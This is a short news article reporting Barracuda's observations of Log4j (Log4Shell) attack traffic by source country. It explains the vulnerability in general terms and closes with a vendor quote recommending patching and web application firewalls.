Given the popularity of the Log4J software- a Java-based logging audit framework within Apache, researchers at Barracuda, a trusted partner and leading provider of cloud-first security solutions, have identified attacks targeting its vulnerabilities that have remained steady since December 10, 2021. Researchers uncovered 83% of the attacks were conducted from IP addresses in the US, with half of those IP addresses being associated with AWS, Azure and other data centres. Meanwhile, 10% of the attacks were conducted from IP addresses in Japan, 3% from Germany, 3% from the Netherlands and 1% from Russia.
While the IP addresses only performed the scans and attempted intrusions, the actual payloads were delivered from other compromised websites or VPS hosts once the attack got through. These IPs bearing the payloads are typically obscured using the Base64 encoding.
Log4j is a Java-based logging audit framework which is an Apache project and used in almost all internet and intranet services. Its newfound vulnerability allows hackers to conduct remote code execution (RCE) attacks on a target system. These attacks are very easy to carry out for anyone aware of their working.
Attackers controlling log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. The vulnerability impacts default configurations of several Apache frameworks, including Apache Struts2, Apache Solr, Apache Druid, and Apache Flink, which are utilised by numerous organisations like Apple, Amazon, Cloudflare, Twitter, Steam, and others. It is triggered by sending a specific string to the Log4j software, which makes it easy to exploit, and the broad utilisation of this software means there are multiple attack vectors.
Sharing his insights on such attacks, Tushar Richabadas, Senior Product Marketing Manager, Applications and Cloud Security, Barracuda said, “Log4j vulnerability has stormed the cyber world. The best way to protect against log4shell specifically is to upgrade to the latest version of log4j software so that vulnerabilities are patched in a timely manner. Due to the growing number of vulnerabilities found in web applications, it is getting progressively more complex to protect against attacks. However, all-in-one solutions are now available to protect web applications from being exploited due to these vulnerabilities. WAF/WAF-as-a-Service solutions, also known as Web Application and API Protection (WAAP) services, can help protect web applications by providing all the latest security solutions in one easy-to-use product.”